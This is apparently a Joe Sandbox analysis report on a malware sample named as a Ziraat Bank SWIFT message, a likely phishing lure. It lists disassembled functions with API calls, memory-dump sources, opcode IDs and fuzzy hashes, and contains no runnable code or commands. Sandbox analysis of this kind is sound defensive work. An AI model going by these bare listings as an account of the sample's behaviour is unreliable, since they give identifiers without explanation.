                                                                          • Opcode ID: cc8a04f67cae069f1118dd2f2f1573ce9f66c9f0552bf268c31a9a1ecdef4294
                                                                          • Instruction ID: 00138c5ec4d8d0e4f0568a7c6ac903f6054ace45e4484299a7dd9a8db0e44444
                                                                          • Opcode Fuzzy Hash: cc8a04f67cae069f1118dd2f2f1573ce9f66c9f0552bf268c31a9a1ecdef4294
                                                                          • Instruction Fuzzy Hash: AB11F0B69007498FCB10DF9AC444ADEFBF5EB88310F10845AD829B7610D375A545CFA9
                                                                          Function 0541AD98 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0541AE06
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 413a34610cf1d1927fda5cfea1df5d76255c1b84b0530256b24bbf46de1b7d81
                                                                          • Instruction ID: 4ac17e870cdf60e33cc880d55b08dc9cc99f58f5825aca266a206a5b0d5b3f6a
                                                                          • Opcode Fuzzy Hash: 413a34610cf1d1927fda5cfea1df5d76255c1b84b0530256b24bbf46de1b7d81
                                                                          • Instruction Fuzzy Hash: DF11F0B68006498FCB10CF9AC844ADEFBF4AB88324F14845AD829B7600D375A545CFA9
                                                                          Function 05419448 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTimer.USER32(?,01136428,?,?), ref: 0541F85D
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: Timer
                                                                          • String ID:
                                                                          • API String ID: 2870079774-0
                                                                          • Opcode ID: df147d5133f960890295baea632ba62ded26d70596abf73b0e7301e5ed17eeaa
                                                                          • Instruction ID: b6dc42fb506780891e38b50371a3df4bffc8e1016870e86c846280ddbddababf
                                                                          • Opcode Fuzzy Hash: df147d5133f960890295baea632ba62ded26d70596abf73b0e7301e5ed17eeaa
                                                                          • Instruction Fuzzy Hash: 8C11F2B58003499FDB10DF9AC845BDEBBF8EB48310F20845AE919A7300D375A984CFA5
                                                                          Function 0541F7F9 Relevance: 1.5, APIs: 1, Instructions: 43timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTimer.USER32(?,01136428,?,?), ref: 0541F85D
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID: Timer
                                                                          • String ID:
                                                                          • API String ID: 2870079774-0
                                                                          • Opcode ID: 86ee9d854ad01a3c3462b1d65d91ea153a520815aedafaf13fb1f8c0f82dad43
                                                                          • Instruction ID: a3f0fee369ff2689953f227588b80897190949ad85c44730b8b1b1269c0eab22
                                                                          • Opcode Fuzzy Hash: 86ee9d854ad01a3c3462b1d65d91ea153a520815aedafaf13fb1f8c0f82dad43
                                                                          • Instruction Fuzzy Hash: 4111F2B98003499FDB10DF99C585BDEBBF4FB48310F10845AD918A7210C375A584CFA5
                                                                          Function 02BE5F08 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: d8bq
                                                                          • API String ID: 0-3484500975
                                                                          • Opcode ID: c485273bedc7f18674265ceb5fb1e9b0bd7536c9a23220abee00b1f7bbe61c03
                                                                          • Instruction ID: b02b57b2e7081c55223498747884c8251024a16a902b9aef1c41981a1ab81eb0
                                                                          • Opcode Fuzzy Hash: c485273bedc7f18674265ceb5fb1e9b0bd7536c9a23220abee00b1f7bbe61c03
                                                                          • Instruction Fuzzy Hash: 4741BF303006058FCB25AB79D458B6E7BE6EFC9304F1449A9E55BCB3A1EF61EC018B91
                                                                          Function 02BE82F8 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: 4210607abfe62e7bdbe8d7fd25000fb1e93df6b53e88fc267299d491a2007f41
                                                                          • Instruction ID: bf2879acbce451f03f51592354d64ef654fb07f5f297cbe299491cba8c55f1c1
                                                                          • Opcode Fuzzy Hash: 4210607abfe62e7bdbe8d7fd25000fb1e93df6b53e88fc267299d491a2007f41
                                                                          • Instruction Fuzzy Hash: 644152756006158FCB149F68D898AAE3BB2FF88351F1544A9F90ACB3B1CB70DD41CBA1
                                                                          Function 02BE8640 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: d92142d4ef371fb5975ad2098d35141554cc23e287d48af0d3a9780529054981
                                                                          • Instruction ID: 76bdfdaeb4df2afd1691954d3c3623b1e9a5100b2dbc8c9b4ec020f3a3e6bc14
                                                                          • Opcode Fuzzy Hash: d92142d4ef371fb5975ad2098d35141554cc23e287d48af0d3a9780529054981
                                                                          • Instruction Fuzzy Hash: 7D21D8727086558FCF15DE69D8406BB7BE6EF85340B1444AAE913C7364DB70C810C7A0
                                                                          Function 02BE5EF8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: d8bq
                                                                          • API String ID: 0-3484500975
                                                                          • Opcode ID: 1ec7cc205cc9531b41d7422f0cfa607e1673615d4d10be988ddc3de49d7a15d8
                                                                          • Instruction ID: bd5d445e8f26722bbd949b6c10b5edfb09a987e5b832a360e12ff9e1821ad2d7
                                                                          • Opcode Fuzzy Hash: 1ec7cc205cc9531b41d7422f0cfa607e1673615d4d10be988ddc3de49d7a15d8
                                                                          • Instruction Fuzzy Hash: 4D11A971610B054FDB36972DD454B5EBBE6EFC4358F048E58E1978B260EBB0E94487C1
                                                                          Function 02BE62A8 Relevance: .2, Instructions: 220COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8c853ae3625587ad63abf63d0ce82de73b29bfbdf5ed151f3324e483df7b39a1
                                                                          • Instruction ID: 862018c63717085f62aa5a4aed4b6c76b84c71059e65fcbce679a8f5305b175b
                                                                          • Opcode Fuzzy Hash: 8c853ae3625587ad63abf63d0ce82de73b29bfbdf5ed151f3324e483df7b39a1
                                                                          • Instruction Fuzzy Hash: 5C71E2307002018FCB199F78D46866E7BAAFF99240B1484A9D546CB399EF34DC42CB91
                                                                          Function 02BE84F8 Relevance: .2, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 26002ee89766ab5af71bf9e3d5fde70a9cc07f3cbe739306f28e68c41f615350
                                                                          • Instruction ID: 0e1c4ae23ca86f4f85843aaae40107b659de86f244bf6f0a5254987fe86b6569
                                                                          • Opcode Fuzzy Hash: 26002ee89766ab5af71bf9e3d5fde70a9cc07f3cbe739306f28e68c41f615350
                                                                          • Instruction Fuzzy Hash: 765178717149158FCB14DF39D898A6A7BEAFF8925470944EAE41BCB372EB21EC01CB50
                                                                          Function 02BE44F0 Relevance: .2, Instructions: 173COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a561c91e3311cb80c31cd62d5cb19336cd49492bc3083727d3f5bbf57c0f000
                                                                          • Instruction ID: 663e4f9cc416778da837bfbe604a49351f89cfadb5cc6461bf8f0efe980cf2a2
                                                                          • Opcode Fuzzy Hash: 1a561c91e3311cb80c31cd62d5cb19336cd49492bc3083727d3f5bbf57c0f000
                                                                          • Instruction Fuzzy Hash: E581CF74E012299FDB65DF29D894BDDBBB2BB89304F1080EAD849A7354DB315E81CF80
                                                                          Function 02BE24F8 Relevance: .1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6167292f78c8a6b719b5ce6f5c71a2b7ecd174ca7147a1f9712646e3602404c
                                                                          • Instruction ID: 958e2df54fd9d5b61bb5bca34689b96ed79d2ffca0a72fc118dc39c955e5c57e
                                                                          • Opcode Fuzzy Hash: a6167292f78c8a6b719b5ce6f5c71a2b7ecd174ca7147a1f9712646e3602404c
                                                                          • Instruction Fuzzy Hash: 4F412171E002199BDF14DFA5C891AEEBBF5EF98700F148169E806B7250EB70AD46CB91
                                                                          Function 02BE5858 Relevance: .1, Instructions: 105COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0db57a65fc1dad936180f199cfa7006908850b9f8c5cbaa577acc857000d209b
                                                                          • Instruction ID: f77875da499f0acfa48e88f22187863c72accbe9accdfaa97c8fb5cc933288e9
                                                                          • Opcode Fuzzy Hash: 0db57a65fc1dad936180f199cfa7006908850b9f8c5cbaa577acc857000d209b
                                                                          • Instruction Fuzzy Hash: 4D410235A0010ADFCF159FA4E8586EF3BA2FB88214F408459F95A8B244DB35D961DBA0
                                                                          Function 02BE8729 Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ddf981a4d65d4838df300a453a2de47b663e4dfcd0331d22cc10f974fb8a116c
                                                                          • Instruction ID: 862079f6c24f8b203568b980e4b941586e4edb24330fd7040ff0b57e40d3e9ad
                                                                          • Opcode Fuzzy Hash: ddf981a4d65d4838df300a453a2de47b663e4dfcd0331d22cc10f974fb8a116c
                                                                          • Instruction Fuzzy Hash: 2321BF347046014BEF295639946837E2697EFC5618B1480B9D913CF3A4EB75DC82D391
                                                                          Function 02BEFED0 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d3d5ad2c7c2cccdc2ae0eeb51de99a245a96ffc2fc14c2eba19e30b983616115
                                                                          • Instruction ID: 378abcf111c6485968c4a06ba03a4c50b7ee941c774029444a0db2c848bcfe6d
                                                                          • Opcode Fuzzy Hash: d3d5ad2c7c2cccdc2ae0eeb51de99a245a96ffc2fc14c2eba19e30b983616115
                                                                          • Instruction Fuzzy Hash: 48212574E0120A9FCB04DFA8C855BEEBBB1EF89310F048569D914B7380DB34A946CFA5
                                                                          Function 0108D3A0 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4526975592.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_108d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: af9dee1cf24d43ee561b480c238ab359ea7f958daae33f7dc4cc4272f5a8c9f1
                                                                          • Instruction ID: 53c90e5b584d6bf260de4504d97659dce0696b2eb156f9602688c5d326323912
                                                                          • Opcode Fuzzy Hash: af9dee1cf24d43ee561b480c238ab359ea7f958daae33f7dc4cc4272f5a8c9f1
                                                                          • Instruction Fuzzy Hash: 2C214CB1508204DFDB01EF98D4C0B29BFA5FB84314F24C6ADD9C90B282C776E445C761
                                                                          Function 0108D1F0 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4526975592.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_108d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c96ef54e0b4011edbaeb1cc4f385b39c811d395473d972591f75b8fc3fa5c98
                                                                          • Instruction ID: d29d14d121e87e78395f8ab8faae5f8c4ee4642dc0be2131c2bd9f15234ca937
                                                                          • Opcode Fuzzy Hash: 0c96ef54e0b4011edbaeb1cc4f385b39c811d395473d972591f75b8fc3fa5c98
                                                                          • Instruction Fuzzy Hash: 1E2107B1508200EFDB11EF98D5C4B2ABFA5FBA4334F24C6A9D8890B286C376D405C7A1
                                                                          Function 0108D030 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4526975592.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_108d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b079b9ebbdb20a37e660740d7c06e5872eb451dca55ce87e04487d60fc396f8
                                                                          • Instruction ID: d6b193e0fbcd7e9b361d02603c11020987935055228fa820a9003c858c29f62a
                                                                          • Opcode Fuzzy Hash: 7b079b9ebbdb20a37e660740d7c06e5872eb451dca55ce87e04487d60fc396f8
                                                                          • Instruction Fuzzy Hash: E4212571508204DFDB11EF98D9C0B2ABBA5EB84314F24C6ADE9C94B282C336D447CB62
                                                                          Function 02BEFEE0 Relevance: .1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f4f88b52f63dba68c4b5bd1fe4d327aa2ccbf21526c8b40f83e6090ff0ab3c10
                                                                          • Instruction ID: ccf0ee31b1aaa455de4db056adc280f1cd1d1af10cfbcaeb34f759173ced406e
                                                                          • Opcode Fuzzy Hash: f4f88b52f63dba68c4b5bd1fe4d327aa2ccbf21526c8b40f83e6090ff0ab3c10
                                                                          • Instruction Fuzzy Hash: EC21E2B4E0020A9FCB04DFA8C455BEEBBB1EF89310F108569D915B7390DB35A945CFA5
                                                                          Function 02BE26EA Relevance: .1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c832b3e1a8ee1ea17ffc56b092982199f46c54b1d74eaf8169a40a269aed9097
                                                                          • Instruction ID: db5adaf494b60f6fc936ca4c3e57593585654e81bf148ffd92c34a3effe7fbc2
                                                                          • Opcode Fuzzy Hash: c832b3e1a8ee1ea17ffc56b092982199f46c54b1d74eaf8169a40a269aed9097
                                                                          • Instruction Fuzzy Hash: 7F110432B083955FCB066F7858242AF3FA3EFD5310B04445AE54ADB396DE348D0287A5
                                                                          Function 02BE2270 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e1f3ce8c3fbb546510564377e073570bda596aa364d46de83c58b8eee9b79d5
                                                                          • Instruction ID: 83647d64372e56c089699b433be29294ff25fe04a6c35dfac4e6e614cf105bfe
                                                                          • Opcode Fuzzy Hash: 4e1f3ce8c3fbb546510564377e073570bda596aa364d46de83c58b8eee9b79d5
                                                                          • Instruction Fuzzy Hash: 261156B680024DDFDB10CF99C804BEEBFF4EB48320F148459EA18A7250D339A550DFA5
                                                                          Function 02BE1EB9 Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 738c2952df75c7036d17c96458f6614556474172299a2bf5b37a18f9fb044b81
                                                                          • Instruction ID: 12b2f186e033f4feca3645d3c34ccd20cae2559062f2354fcf5b34d0ea72a36d
                                                                          • Opcode Fuzzy Hash: 738c2952df75c7036d17c96458f6614556474172299a2bf5b37a18f9fb044b81
                                                                          • Instruction Fuzzy Hash: 3411E834E112498FDF14DFFCE850BAEBBB5AB49311F1095A1E80DAB349E7309D428B91
                                                                          Function 0108D02B Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4526975592.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_108d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 940b02a0978f1260169b41e4addd6cc2d084ad154835e3a44dc3b39ebcea2ae0
                                                                          • Instruction ID: 00bf6465271d45fd030e477bbc7faa788258c55f0da53088ed5d688046e61215
                                                                          • Opcode Fuzzy Hash: 940b02a0978f1260169b41e4addd6cc2d084ad154835e3a44dc3b39ebcea2ae0
                                                                          • Instruction Fuzzy Hash: AD11EE75508280CFCB12DF54C5C0B15BBA2FB84314F24C6AAE8894B292C33AD44BCF61
                                                                          Function 0108D1EB Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4526975592.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_108d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 364e0663795d3a7092d6d469d7a658fcc3c712194600f66383d0b848ec03e1c7
                                                                          • Instruction ID: 45a91a6f76e33a5a36fdae250f203617c7d62258ac94e0f6cc8a3cb2999e5a91
                                                                          • Opcode Fuzzy Hash: 364e0663795d3a7092d6d469d7a658fcc3c712194600f66383d0b848ec03e1c7
                                                                          • Instruction Fuzzy Hash: BB112775508280DFDB02DF54D5C4B15FFB1FB94324F24C6AAD8890B686C33AD40ACB91
                                                                          Function 0108D39B Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4526975592.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_108d000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 940b02a0978f1260169b41e4addd6cc2d084ad154835e3a44dc3b39ebcea2ae0
                                                                          • Instruction ID: 308be317666c1554318ebe82ad50a4c6f1af87a12ede5527038e460cf730542a
                                                                          • Opcode Fuzzy Hash: 940b02a0978f1260169b41e4addd6cc2d084ad154835e3a44dc3b39ebcea2ae0
                                                                          • Instruction Fuzzy Hash: 0511DD75508280CFDB02DF58D5C4B55BFB2FB84314F24C6AAD9894B696C33AE44ACB62
                                                                          Function 02BE2990 Relevance: .1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 178726a1aa2868580156bd696f8f8df464b77eba4dced21a480ea0c294b32712
                                                                          • Instruction ID: 14b645d46a3755e75bfe2f0e6a6d88e508b9ea533872cde3ece1c508fe537635
                                                                          • Opcode Fuzzy Hash: 178726a1aa2868580156bd696f8f8df464b77eba4dced21a480ea0c294b32712
                                                                          • Instruction Fuzzy Hash: 7E1156B680024ADFDB10CF99C844BDEBFF4EF48320F14845AE924A7250D339A650DFA1
                                                                          Function 02BE60B0 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 518e606c659d239b61080171bcc4fbbba73f75a14e3601bb4c218dde3ae44e7f
                                                                          • Instruction ID: b7a1b5a6afd416353c06d0d04a4995c0309933eb5c1a5a8ac8acadc0bf9e6e04
                                                                          • Opcode Fuzzy Hash: 518e606c659d239b61080171bcc4fbbba73f75a14e3601bb4c218dde3ae44e7f
                                                                          • Instruction Fuzzy Hash: 1501D632B041286B9F159E599810AEF3B9BEBC8690F188069F51AD7280EB718C119BE4
                                                                          Function 02BE60A0 Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c675ac3a4ea216214ad3ad08c94765c6b1d5cc81366d0b251f19e8e261e864a1
                                                                          • Instruction ID: d0ccf758f3b5d487d4da5f71331bcbb767895bebfaaf7d2b86a4c637b44e462d
                                                                          • Opcode Fuzzy Hash: c675ac3a4ea216214ad3ad08c94765c6b1d5cc81366d0b251f19e8e261e864a1
                                                                          • Instruction Fuzzy Hash: A001F973A041186BDF119E59EC00BDF3FAADBD8350F088065F519C7241E735C81197A0
                                                                          Function 02BE68A1 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 260c8b6aec3bcfdf19552a608c6c7e0a63d8c902e569aafdcce75f672358911d
                                                                          • Instruction ID: b2e1f040cee180adb4a9c31d15add5a15ecd6a48b08da5d4b818185627132252
                                                                          • Opcode Fuzzy Hash: 260c8b6aec3bcfdf19552a608c6c7e0a63d8c902e569aafdcce75f672358911d
                                                                          • Instruction Fuzzy Hash: 63D012768403198ACA15F7F8B65D7947B66F780108F144D15900747A5BFA706B664660
                                                                          Function 02BE947D Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d80788a22a7d16ea5cc63463665be7d065dbf285732329f8612b2a3f8c668fd7
                                                                          • Instruction ID: 852767fc645f2fdbdeb9d0de0ac16481d7bbe5b6a6481a6eed0cf37758cd548d
                                                                          • Opcode Fuzzy Hash: d80788a22a7d16ea5cc63463665be7d065dbf285732329f8612b2a3f8c668fd7
                                                                          • Instruction Fuzzy Hash: 69D0673AB40018DFCB049F9CE8508DDFB76FB98221B048516E915E3265C6719925DB54
                                                                          Function 02BE68B0 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
